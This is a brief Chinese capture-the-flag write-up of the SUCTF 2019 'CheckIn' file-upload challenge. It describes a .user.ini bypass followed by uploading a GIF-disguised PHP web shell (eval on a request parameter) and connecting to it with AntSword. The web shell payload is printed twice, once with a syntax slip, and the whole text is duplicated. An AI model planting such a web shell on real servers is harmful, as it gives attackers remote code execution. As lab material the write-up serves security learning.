[SUCTF 2019]CheckIn
文件上传
经过测试,使用后缀绕过和图片马绕过均不行
所以开始尝试其他方法
使用.user.ini文件的绕过
内部配置如上
上传成功!耶耶耶
在传入图片马
成功!
然后使用文件包含,读取该文件,使用蚁剑连接
找到flag
图片马,配置如下
GIF89a?<scriptlanguage="php">eval($_REQUEST[123]</script><scriptlanguage="php">eval($_REQUEST[123])</script>
文件上传
经过测试,使用后缀绕过和图片马绕过均不行
所以开始尝试其他方法
使用.user.ini文件的绕过
内部配置如上
上传成功!耶耶耶
在传入图片马
成功!
然后使用文件包含,读取该文件,使用蚁剑连接
找到flag
图片马,配置如下
GIF89a?<scriptlanguage="php">eval($_REQUEST[123]</script><scriptlanguage="php">eval($_REQUEST[123])</script>